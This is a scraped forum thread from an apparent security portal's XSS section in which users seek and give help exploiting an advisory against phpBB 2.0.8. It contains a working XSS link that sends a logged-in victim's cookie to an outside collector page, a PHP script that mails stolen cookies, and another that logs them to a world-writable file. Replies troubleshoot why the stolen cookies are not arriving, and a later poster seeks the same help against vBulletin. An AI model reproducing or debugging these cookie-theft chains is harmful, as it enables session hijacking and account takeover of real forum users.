 |
Menu |
 |
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
 |
User Info |
 |
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 301
Members: 0
Total: 301
|
|
|
|
|
 |
Full disclosure |
 |
CyberDanube Security Research 20251014-0 | Multiple Vulnerabilities in Phoenix Contact QUINT4 UPS
apis.google.com - Insecure redirect via __lu parameter(exploited in the wild)
Urgent Security Vulnerabilities Discovered in Mercku Routers Model M6a
Re: Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS)
Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS)
[SBA-ADV-20250730-01] CVE-2025-39664: Checkmk Path Traversal
[SBA-ADV-20250724-01] CVE-2025-32919: Checkmk Agent Privilege Escalation via Insecure Temporary Files
CVE-2025-59397 - Open Web Analytics SQL Injection
Re: [FD]Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Re: Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Re: Defense in depth -- the Microsoft way (part 93): SRP/SAFERwhitelisting goes black on Windows 11
Re: [FD]: "Glass Cage" – Zero-Click iMessage ? Persistent iOS Compromise + Bricking (CVE-2025-24085 / 24201, CNVD-2025-07885)
Re: [FD]Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Samtools v1.22.1 Uncontrolled Memory Allocation from Large BED Intervals Causes Denial-of-Service in Samtools/HTSlib
Samtools v1.22.1 Improper Handling of Excessive Histogram Bin Counts in Samtools Coverage Leads to Stack Overflow
|
|
|
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
XSS phpBB 2.0.8 |
 |
Posted: Sun Sep 19, 2004 12:34 am |
|
|
Nicolas |
Regular user |

 |
|
Joined: Sep 19, 2004 |
Posts: 10 |
|
|
|
 |
 |
 |
|
Hi All
Thx for your forum, it's very good
I have a problem when I want exploit this advisorie:
http://www.waraxe.us/?modname=sa&id=034
I write this link:
Code: | http://www.sitevulnerable.com/forum/faq.php?faq%5b0%5d%5b0%5d=f00<script>document.location='www.site.com/code_evil.php?cookie='+window.document.cookie;</script>bar&faq%5b0%5d%5b1%5d=lOeil |
and my code_evil.php is:
Code: | <?php
$cokie = $_GET['cookie'];
mail('email@hotmail.com', 'A New cookie', $cokie);
?> |
But ,I'm loggued anc I clic on the link, but I don't receive my cookie
What's the problem please  |
|
|
|
|
Posted: Sun Sep 19, 2004 2:33 am |
|
|
Dark Dragon |
Regular user |

 |
|
Joined: Aug 26, 2004 |
Posts: 11 |
|
|
|
 |
 |
 |
|
i don't like emailer scripts personnaly
id prefer
Code: |
<?php
$fp = fopen('logger.txt','a'); // open to append
fwrite($fp, $_GET['cookie']."~~~~~~~~~"); // write the cookie information
fclose($fp);
?> |
and logger.txt (chmodded 777) |
|
|
|
|
Posted: Sun Sep 19, 2004 7:09 pm |
|
|
Nicolas |
Regular user |

 |
|
Joined: Sep 19, 2004 |
Posts: 10 |
|
|
|
 |
 |
 |
|
Thx for your script, it's nice methode
But did you know why my script don't work ? |
|
|
|
|
 |
Re: XSS phpBB 2.0.8 |
 |
Posted: Sun Sep 19, 2004 8:25 pm |
|
|
waraxe |
Site admin |

 |
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
 |
 |
 |
|
Nicolas wrote: | Hi All
Thx for your forum, it's very good
I have a problem when I want exploit this advisorie:
http://www.waraxe.us/?modname=sa&id=034
I write this link:
Code: | http://www.sitevulnerable.com/forum/faq.php?faq%5b0%5d%5b0%5d=f00<script>document.location='www.site.com/code_evil.php?cookie='+window.document.cookie;</script>bar&faq%5b0%5d%5b1%5d=lOeil |
and my code_evil.php is:
Code: | <?php
$cokie = $_GET['cookie'];
mail('email@hotmail.com', 'A New cookie', $cokie);
?> |
But ,I'm loggued anc I clic on the link, but I don't receive my cookie
What's the problem please  |
You don't receive email at all, or you receive email without cookie?
If you don't get email at all, then there can be problem with spam
filters and it's related to server, in which you use "mail()" function.
I have encountered many servers, that are "banned" from hotmail.com
and mails are just not getting through ... |
|
|
|
|
 |
 |
aa |
 |
Posted: Mon Sep 20, 2004 8:45 pm |
|
|
SteX |
Advanced user |

 |
|
Joined: May 18, 2004 |
Posts: 181 |
Location: Serbia |
|
|
 |
 |
 |
|
Always check your Junk E-Mail..  |
|
_________________
We would change the world, but God won't give us the sourcecode...
....Watch the master. Follow the master. Be the master....
------------------------------------------------------- |
|
|
|
Posted: Wed Sep 22, 2004 3:23 pm |
|
|
Nicolas |
Regular user |

 |
|
Joined: Sep 19, 2004 |
Posts: 10 |
|
|
|
 |
 |
 |
|
I didn't receive emails and I thank again the problem is a filters problem not a code problem
The email to receive is hotmail
I will test with an other email
Thx for all
I will post my results  |
|
|
|
|
Posted: Sun Jan 16, 2005 7:24 pm |
|
|
Injector |
Active user |

 |
|
Joined: Dec 29, 2004 |
Posts: 49 |
|
|
|
 |
 |
 |
|
hey can anyone help me Im having the same problem I used the php script
which sends the cookie to your email address. I receive the cookie but its
empty though. what did i do wrong or do i have to add anything else?
I'm doing it on vbulletin using some exploit on [IMG tags |
|
|
|
|
www.waraxe.us Forum Index -> Cross-site scripting aka XSS
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|